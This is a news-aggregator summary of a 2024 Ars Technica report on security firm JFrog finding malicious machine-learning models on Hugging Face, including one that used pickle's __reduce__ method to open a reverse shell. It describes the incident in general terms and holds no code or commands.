Sign up to save tools and stay up to date with the latest in AI
bg
bg
1

Hugging Face, the GitHub of AI, hosted code that backdoored user devices

Mar 02, 2024 - arstechnica.com
Researchers from security firm JFrog have discovered that code uploaded to AI developer platform Hugging Face covertly installed backdoors and other types of malware on end-user machines. They found roughly 100 submissions that performed hidden and unwanted actions when downloaded and loaded onto an end-user device. Most of these machine learning models went undetected by Hugging Face and appeared to be benign proofs of concept uploaded by researchers or curious users. However, 10 of them were found to be “truly malicious” as they compromised users’ security when loaded.

One model was of particular concern as it opened a reverse shell that gave a remote device on the internet full control of the end user’s device. This model was submitted by a user named baller432 and was able to evade Hugging Face’s malware scanner by using pickle's "__reduce__" method to execute arbitrary code after loading the model file. This silent infiltration could potentially grant access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage. Hugging Face has since removed the model and the others flagged by JFrog.

Key takeaways:

  • Malicious code was covertly installed on end-user machines through the AI developer platform Hugging Face, according to a report by security firm JFrog.
  • Out of roughly 100 submissions that performed hidden and unwanted actions, 10 were found to be 'truly malicious', compromising users' security when loaded.
  • One model opened a reverse shell, giving a remote device full control of the end user's device, a major breach of researcher ethics.
  • The malicious models used pickle, a format recognized as inherently risky, to sneak in malicious code. The model that spawned the reverse shell was submitted by a user named baller432 and was able to evade Hugging Face's malware scanner.
View Full Article

Comments (0)

Be the first to comment!